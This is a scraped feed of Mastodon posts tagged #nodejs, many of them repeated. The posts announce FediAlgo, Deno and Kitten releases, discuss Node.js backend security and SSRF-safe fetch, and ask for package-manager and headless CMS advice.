The fine @michael has deployed the #FediAlgo demo app to a place where you can test out the customizable algorithm + filtering system for your home timeline with nothing more than a web browser. You can find it here:

https://fedialgo.thms.uk/

Here's a video of the FediAlgo demo in action (there's a few new features since the video): https://universeodon.com/@cryptadamist/114395249311910522

cc: @rolle @paige @LaurensHof

#FediTools #FediTips #Fediverse #Mastodon #activitypub #mastohelp #Fedi #foss #nodejs #opensource #MastoAdmin #SocialWeb #Feed #timeline #algorithmicFeed #algorithmicTimeline #TL #algorithm #node #nodejs

The fine @michael has deployed the #FediAlgo demo app to a place where you can test out the customizable algorithm + filtering system for your home timeline with nothing more than a web browser. You can find it here:

https://fedialgo.thms.uk/

Here's a video of the FediAlgo demo in action (there's a few new features since the video): https://universeodon.com/@cryptadamist/114395249311910522

cc: @rolle @paige @LaurensHof

#FediTools #FediTips #Fediverse #Mastodon #activitypub #mastohelp #Fedi #foss #nodejs #opensource #MastoAdmin #SocialWeb #Feed #timeline #algorithmicFeed #algorithmicTimeline #TL #algorithm #node #nodejs

The fantastic @adonisframework — which we used to build @iftas CCS reasonably quickly — is now on Mastodon / the Fediverse!

If you're looking for a fantastic #nodejs web framework, Adonis.js is not to miss!

Is Node.js the future of backend development, or just a beautifully wrapped grenade?

Lately, I see more and more backend systems, yes, even monoliths, built entirely in Node.js, sometimes with server-side rendering layered on top. These are not toy projects. These are services touching sensitive PII data, sometimes in regulated industries.

When I first used Node.js years ago, I remember:
• Security concepts were… let’s say aspirational.
• Licensing hell due to questionable npm dependencies.
• Tests were flaky, with mocking turning into dark rituals.
• Behavior of libraries changed weekly like socks, but more dangerous.
• Internet required to run a “local” build. How comforting.

Even with TypeScript, it all melts back into JavaScript at runtime, a language so flexible it can hang itself.

Sure, SSR and monoliths can simplify architecture. But they also widen the attack surface, especially when:
• The backend is non-compiled.
• Every endpoint is a potential open door.
• The system needs Node + a fleet of dependencies + a container + prayer just to run.

Compare that to a compiled, stateless binary that:
• Runs in a scratch container.
• Requires zero runtime dependencies.
• Has encryption at rest, in transit, and ideally per-user.
• Can be observed, scaled, audited, stateless and destroyed with precision.

I’ve shipped frontends that are static, CDN-delivered, secure by design, and light enough to fit on a floppy disk. By running them with Node, I’m loading gigabytes of unknown tooling to render “Hello, user”.

So I wonder:
Is this the future? Or am I just… old?

Are we replacing mature, scalable architectures with serverless spaghetti and 12-factor mayhem because “it works on Vercel”?

Tell me how you build secure, observable, compliant systems in Node.js.
Genuinely curious.
Mildly terrified and maybe old.

#NodeJS #BackendSecurity #SecureCoding #PII #Compliance #SoftwareArchitecture #ServerSideRendering #TypeScript #Java #Kotlin #Golang #Erlang #Ruby #Scalability #Observability #DevSecOps #LegacyVsModern #SecureByDesign #CompiledLanguages #CloudArchitecture #StatelessDesign #SecurityTheatre #TechSatire #LinkedInTechRant

Wrote a little parser for meshcore packets tonight. It's still messy and a lot more to implement. But, it reads the container format so I'm happy for now.

I have meshcore packets flowing from multiple repeaters(on different frequencies) talking on wifi using udp broadcasts.

The repeaters automatically discover each other on the network and now I'm able to watch their chatter with a quick nodejs server.

#lora #meshcore #networking #radio #nodejs #container #incus

The FediAlgo hashtag filter section now highlights any hashtags you've posted about recently.

Interestingly the most I've used the app the more I've found feed filtering gets a ton of mileage for me. It's a huge change of pace to be able to instantly flip between whatever people are talking about on the Fediverse. Not really something you can do on any other social media platform I'm aware of.

* video of FediAlgo + link: https://universeodon.com/@cryptadamist/114395249311910522

#FediTools #FediTips #Fediverse #Mastodon #activitypub #mastohelp #Fedi #foss #nodejs #opensource #MastoAdmin #SocialWeb #Feed #timeline #algorithmicFeed #algorithmicTimeline #TL #algorithm #node #nodejs #hashtag #hashtaggames

The FediAlgo hashtag filter section now highlights any hashtags you've posted about recently.

Interestingly the most I've used the app the more I've found feed filtering gets a ton of mileage for me. It's a huge change of pace to be able to instantly flip between whatever people are talking about on the Fediverse. Not really something you can do on any other social media platform I'm aware of.

* video of FediAlgo + link: https://universeodon.com/@cryptadamist/114395249311910522

#FediTools #FediTips #Fediverse #Mastodon #activitypub #mastohelp #Fedi #foss #nodejs #opensource #MastoAdmin #SocialWeb #Feed #timeline #algorithmicFeed #algorithmicTimeline #TL #algorithm #node #nodejs #hashtag #hashtaggames

hola wafrn amiguis!! I have published my Wafrn SDK for NodeJS!
https://www.npmjs.com/package/wafrn-sdk

hola wafrn amiguis!! I have published my Wafrn SDK for NodeJS!
https://www.npmjs.com/package/wafrn-sdk

"Deno has allowed us to transition services faster without sacrificing reliability," says Plaid architecture lead Zander Hill.

Here's how they did it 👇

https://deno.com/blog/how-plaid-migrated-critical-services-with-deno

#deno #nodejs #javascript #typescript

Ω🪬Ω
New release of #FediAlgo (customizable #algorithm for your #Mastodon timeline) has a couple of cool features:

1. Configuration presets (so you can easily put discussions or trending toots at the top of your #timeline without fiddling with the individual settings)

2. A "What's Trending" section that will show you the top trending hashtags, links, and posts scraped from 30 or so of the most popular Mastodon servers

All the old features like filtering for particular languages / hashtags / users or a minimum number of replies / boosts / etc. are still there.

* Usable demo: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Library: https://github.com/michelcrypt4d4mus/fedialgo

#FediTools #FediTips #Fediverse #Mastodon #activitypub #mastohelp #Fedi #foss #nodejs #opensource #MastoAdmin #Feed #timeline #algorithmicFeed #algorithmicTimeline #TL #algorithm #node #nodejs

You can now add JSR packages with @yarnpkg and @pnpmjs

https://deno.com/blog/add-jsr-with-pnpm-yarn

#deno #nodejs #javascript #typescript #webdev

You can now add JSR packages with @yarnpkg and @pnpmjs

https://deno.com/blog/add-jsr-with-pnpm-yarn

#deno #nodejs #javascript #typescript #webdev

Ω🪬Ω
New release of #FediAlgo (customizable #algorithm for your #Mastodon timeline) has a couple of cool features:

1. Configuration presets (so you can easily put discussions or trending toots at the top of your #timeline without fiddling with the individual settings)

2. A "What's Trending" section that will show you the top trending hashtags, links, and posts scraped from 30 or so of the most popular Mastodon servers

All the old features like filtering for particular languages / hashtags / users or a minimum number of replies / boosts / etc. are still there.

* Usable demo: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Library: https://github.com/michelcrypt4d4mus/fedialgo

#FediTools #FediTips #Fediverse #Mastodon #activitypub #mastohelp #Fedi #foss #nodejs #opensource #MastoAdmin #Feed #timeline #algorithmicFeed #algorithmicTimeline #TL #algorithm #node #nodejs

Ω🪬Ω
New release of #FediAlgo (customizable #algorithm for your #Mastodon timeline) has a couple of cool features:

1. Configuration presets (so you can easily put discussions or trending toots at the top of your #timeline without fiddling with the individual settings)

2. A "What's Trending" section that will show you the top trending hashtags, links, and posts scraped from 30 or so of the most popular Mastodon servers

All the old features like filtering for particular languages / hashtags / users or a minimum number of replies / boosts / etc. are still there.

* Usable demo: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Library: https://github.com/michelcrypt4d4mus/fedialgo

#FediTools #FediTips #Fediverse #Mastodon #activitypub #mastohelp #Fedi #foss #nodejs #opensource #MastoAdmin #Feed #timeline #algorithmicFeed #algorithmicTimeline #TL #algorithm #node #nodejs

Ω🪬Ω
New release of #FediAlgo (customizable #algorithm for your #Mastodon timeline) has a couple of cool features:

1. Configuration presets (so you can easily put discussions or trending toots at the top of your #timeline without fiddling with the individual settings)

2. A "What's Trending" section that will show you the top trending hashtags, links, and posts scraped from 30 or so of the most popular Mastodon servers

All the old features like filtering for particular languages / hashtags / users or a minimum number of replies / boosts / etc. are still there.

* Usable demo: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Library: https://github.com/michelcrypt4d4mus/fedialgo

#FediTools #FediTips #Fediverse #Mastodon #activitypub #mastohelp #Fedi #foss #nodejs #opensource #MastoAdmin #Feed #timeline #algorithmicFeed #algorithmicTimeline #TL #algorithm #node #nodejs

Ω🪬Ω
New release of #FediAlgo (customizable #algorithm for your #Mastodon timeline) has a couple of cool features:

1. Configuration presets (so you can easily put discussions or trending toots at the top of your #timeline without fiddling with the individual settings)

2. A "What's Trending" section that will show you the top trending hashtags, links, and posts scraped from 30 or so of the most popular Mastodon servers

All the old features like filtering for particular languages / hashtags / users or a minimum number of replies / boosts / etc. are still there.

* Usable demo: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Library: https://github.com/michelcrypt4d4mus/fedialgo

#FediTools #FediTips #Fediverse #Mastodon #activitypub #mastohelp #Fedi #foss #nodejs #opensource #MastoAdmin #Feed #timeline #algorithmicFeed #algorithmicTimeline #TL #algorithm #node #nodejs

How to automatically associate console logs by request with @opentelemetry and Hyperdx

https://docs.deno.com/examples/hyperdx_tutorial/

#deno #nodejs #javascript #typescript #opentelemetry

How to automatically associate console logs by request with @opentelemetry and Hyperdx

https://docs.deno.com/examples/hyperdx_tutorial/

#deno #nodejs #javascript #typescript #opentelemetry

How to automatically associate console logs by request with @opentelemetry and Hyperdx

https://docs.deno.com/examples/hyperdx_tutorial/

#deno #nodejs #javascript #typescript #opentelemetry

New Kitten release 🎉

https://kitten.small-web.org

• New: Lovely new icons¹ and new callouts in Kitten Settings²

• New: Markdown now supports attributes and bracketed spans³

• New: client-side `kitten` global with `trigger` function for triggering events on the server from the client. (Useful when streaming client-side JavaScript when using Kitten’s Streaming HTML⁴ workflow. e.g., when you have to use a client-only web API like the Clipboard API but you want to keep all your logic on your server-side page.⁵)

• Fixed: The bound render function returned by `KittenComponent` class’s `component` getter now correctly awaits asynchronous templates. (In Kitten, you don’t have to care whether your templates contain promises. Kitten handles all that for you.)

Enjoy! 💕

¹ https://kitten.small-web.org/reference/#icons

² https://mastodon.ar.al/@aral/114381983893061099

³ https://kitten.small-web.org/reference/#markdown-support (also see https://mastodon.ar.al/@aral/114381462302862256)

⁴ https://kitten.small-web.org/tutorials/streaming-html/

⁵ e.g., See how I use this to implement a copy to clipboard button in the database page of Kitten’s Settings: https://codeberg.org/kitten/app/src/branch/main/web/%F0%9F%90%B1/settings%F0%9F%94%92/db/index.page.js#L33 Of course, you don’t have to use this and you can just write client-side JavaScript or use the built-in Alpine.js integration. e.g., how I do it on the (older) settings/identity page: https://codeberg.org/kitten/app/src/branch/main/web/%F0%9F%90%B1/settings%F0%9F%94%92/identity/index.page.js#L7

#Kitten #SmallWeb #web #dev #markdown #icons #PhosphorIcons #HTML #CSS #JavaScript #StreamingHTML #htmx #WebSocket #NodeJS

New Kitten release 🎉

https://kitten.small-web.org

• New: Lovely new icons¹ and new callouts in Kitten Settings²

• New: Markdown now supports attributes and bracketed spans³

• New: client-side `kitten` global with `trigger` function for triggering events on the server from the client. (Useful when streaming client-side JavaScript when using Kitten’s Streaming HTML⁴ workflow. e.g., when you have to use a client-only web API like the Clipboard API but you want to keep all your logic on your server-side page.⁵)

• Fixed: The bound render function returned by `KittenComponent` class’s `component` getter now correctly awaits asynchronous templates. (In Kitten, you don’t have to care whether your templates contain promises. Kitten handles all that for you.)

Enjoy! 💕

¹ https://kitten.small-web.org/reference/#icons

² https://mastodon.ar.al/@aral/114381983893061099

³ https://kitten.small-web.org/reference/#markdown-support (also see https://mastodon.ar.al/@aral/114381462302862256)

⁴ https://kitten.small-web.org/tutorials/streaming-html/

⁵ e.g., See how I use this to implement a copy to clipboard button in the database page of Kitten’s Settings: https://codeberg.org/kitten/app/src/branch/main/web/%F0%9F%90%B1/settings%F0%9F%94%92/db/index.page.js#L33 Of course, you don’t have to use this and you can just write client-side JavaScript or use the built-in Alpine.js integration. e.g., how I do it on the (older) settings/identity page: https://codeberg.org/kitten/app/src/branch/main/web/%F0%9F%90%B1/settings%F0%9F%94%92/identity/index.page.js#L7

#Kitten #SmallWeb #web #dev #markdown #icons #PhosphorIcons #HTML #CSS #JavaScript #StreamingHTML #htmx #WebSocket #NodeJS

#nodejs #denojs #jsr #bunjs #npm #webdev #javascript

Deno v2.2.10 is out 🎉
⭐ Faster deno install with npm
⭐ improved node:test
⭐ stream and querystring fixes
⭐ virtio VSOCK on Linux
and more!

https://github.com/denoland/deno/releases/tag/v2.2.10

#deno #javascript #typescript #nodejs

Like the Bluesky team wrote a tonne of code to prevent common node.js fetch() security bugs, including:
- SSRF attacks
- Disabling automatic following of redirects
- malicious protocols
- timeouts
- response size attacks

But somehow none of this is really ever considered by most folks when using fetch() in node.js

https://github.com/bluesky-social/atproto/blob/main/packages/internal/fetch-node/src/safe.ts

#nodejs #security

Something I've never seen documented is how to actually do SSRF prevention with Node.js's fetch implementation.

Like you could resolve DNS before making the request, and assert the IP addresses are public IP addresses, but afaict, fetch() will do that too so you could theoretically get two different results (although unlikely)

Feels like Node.js should just ship an SSRF safe fetch implementation.

#nodejs #security

Node Just Added TypeScript Support. What Does That Mean for Deno?, by @tinyclouds.org (@deno_land):

https://deno.com/blog/typescript-in-node-vs-deno

#typescript #nodejs #deno

New Kitten release

• Fixes #236¹: The data preview pages in Kitten’s settings how handle circular references in the deserialised data (which may contain your custom classes if that’s what you were persisting in the database).

https://kitten.small-web.org

💕

PS. Those pages are very rudimentary at the moment and are good for getting quick visual overview of the data you’re persisting. For a fully interactive view, use Kitten’s interactive shell (REPL)² to explore your data until I’ve had a chance to implement a more comprehensive visual interface.

PPS. You persist data in Kitten using the built-in JavaScript Database (JSDB)³ (Or, of course, you can install and use any other database.)

¹ https://codeberg.org/kitten/app/issues/236
² https://kitten.small-web.org/reference/#kitten-s-interactive-shell-repl
³ https://codeberg.org/small-tech/jsdb#javascript-database-jsdb

#Kitten #SmallWeb #update #changes #database #JavaScriptDatabase #JSDB #javascript #nodeJS #web #dev

New Kitten release

• Fixes #236¹: The data preview pages in Kitten’s settings how handle circular references in the deserialised data (which may contain your custom classes if that’s what you were persisting in the database).

https://kitten.small-web.org

💕

PS. Those pages are very rudimentary at the moment and are good for getting quick visual overview of the data you’re persisting. For a fully interactive view, use Kitten’s interactive shell (REPL)² to explore your data until I’ve had a chance to implement a more comprehensive visual interface.

PPS. You persist data in Kitten using the built-in JavaScript Database (JSDB)³ (Or, of course, you can install and use any other database.)

¹ https://codeberg.org/kitten/app/issues/236
² https://kitten.small-web.org/reference/#kitten-s-interactive-shell-repl
³ https://codeberg.org/small-tech/jsdb#javascript-database-jsdb

#Kitten #SmallWeb #update #changes #database #JavaScriptDatabase #JSDB #javascript #nodeJS #web #dev

How send @opentelemetry data from your #Deno (or #NodeJS) app to @honeycombio
https://docs.deno.com/examples/honeycomb_tutorial/

Deno v2.2.10 is out 🎉
⭐ Faster deno install with npm
⭐ improved node:test
⭐ stream and querystring fixes
⭐ virtio VSOCK on Linux
and more!

https://github.com/denoland/deno/releases/tag/v2.2.10

#deno #javascript #typescript #nodejs

Deno v2.2.10 is out 🎉
⭐ Faster deno install with npm
⭐ improved node:test
⭐ stream and querystring fixes
⭐ virtio VSOCK on Linux
and more!

https://github.com/denoland/deno/releases/tag/v2.2.10

#deno #javascript #typescript #nodejs

Deno v2.2.10 is out 🎉
⭐ Faster deno install with npm
⭐ improved node:test
⭐ stream and querystring fixes
⭐ virtio VSOCK on Linux
and more!

https://github.com/denoland/deno/releases/tag/v2.2.10

#deno #javascript #typescript #nodejs

Node Just Added TypeScript Support. What Does That Mean for Deno?, by @tinyclouds.org (@deno_land):

https://deno.com/blog/typescript-in-node-vs-deno

#typescript #nodejs #deno

Traces can show:
- which code triggered an operation
- what happened
- when it happened, and
- how long it took

Here's how you can make your traces include all child operations to simplify debugging 👇

#deno #otel #nodejs

Traces can show:
- which code triggered an operation
- what happened
- when it happened, and
- how long it took

Here's how you can make your traces include all child operations to simplify debugging 👇

#deno #otel #nodejs

Simplify debugging with Deno and @opentelemetry
✅ logs associated with requests
✅ immediate traces and metrics
✅ works on Node.js backends
without any additional code or config ✨

https://deno.com/blog/zero-config-debugging-deno-opentelemetry

#deno #opentelemetry #nodejs #Observability #telemetry

Node Just Added TypeScript Support. What Does That Mean for Deno?, by @tinyclouds.org (@deno_land):

https://deno.com/blog/typescript-in-node-vs-deno

#typescript #nodejs #deno

Data analysis in Jupyter notebooks with... TypeScript?! 😱
✅ using `fetch` and other web standards
✅ fast dataframes with nodejs-polars
✅ easy charts with @observablehq
✅ rich interactive UIs with JavaScript

Learn more in this detailed walkthrough 👇
https://deno.com/blog/exploring-art-with-typescript-and-jupyter

#deno #nodejs #javascript #typescript #jupyter #data

Data analysis in Jupyter notebooks with... TypeScript?! 😱
✅ using `fetch` and other web standards
✅ fast dataframes with nodejs-polars
✅ easy charts with @observablehq
✅ rich interactive UIs with JavaScript

Learn more in this detailed walkthrough 👇
https://deno.com/blog/exploring-art-with-typescript-and-jupyter

#deno #nodejs #javascript #typescript #jupyter #data

Package Manager for Markdown

I'm working on a project that is intended to encourage folk to make markdown text files which can be bundled together in different bundles of text files using a package manager.

Question for coders; Which package manager would you suggest I use?

Main criterias (in order) are:

1. Easy for someone with basic command line skills to edit the file and update version numbers and add additional packages.

2. All being equal, more commonly and easy to setup is preferred.

#Markdown #CommonMark #PackageManager #Programming #Dev
#NPM #RubyGems #Cargo #PickingAMastodonInstance
#Ruby #Python #Rust #Javascript #NodeJs #Lisp #CommonGuide

Looking for CMS advice

Hey Web devs!

Do you have any suggestions, tips, opinions, dos, don’ts about headless CMSes?

I have a growing list of small/mid non-profits and collectives asking for my help to (re)make their website. I totally want to help, but I don’t have much time, especially considering that they generally have little or no funding—I would most definitely point them to @VillageOneCoop, otherwise.

Therefore, I want a super simple and replicable solution where I can copy-paste most of the code, while providing them with a stable, fast, and modern solution. I had a look at the Headless CMS section in the Jamstack website, but I need opinions from people who actually used some of that software already.

Needs

• I want to code and configure everything using @eleventy
• Admin interface (#WebApp) for the client to add pages and write posts
• Static website in the front-end
• Simple and reliable CI/CD
• No/minimal maintenance after the first setup
• Self-hostable (I was taking this for granted so much that I forgot to write it)
• If it requires forge integration, it should support #ForgeJo
• #OpenSource

Nice to have

• Possibly using #Deno, not #NodeJS
• Allowing the client to customize a bit their website through the admin interface, with a GUI
• CMS app packaged on @yunohost
• No CMS vendor lock-in
• I’d love to write as little JavaScript as possible
• #FreeSoftware

Absolutely not

• Front-end #JavaScript frameworks

Please, boost this and ask around! Links to videos, tutorials, and resources are welcome.

People whose perspective I would really value: @zachleat @harryfk @deno_land @jaredwhite @vanillaweb @stefan @mxbck @WeirdWriter @deadsuperhero (Sorry if I am spamming you!)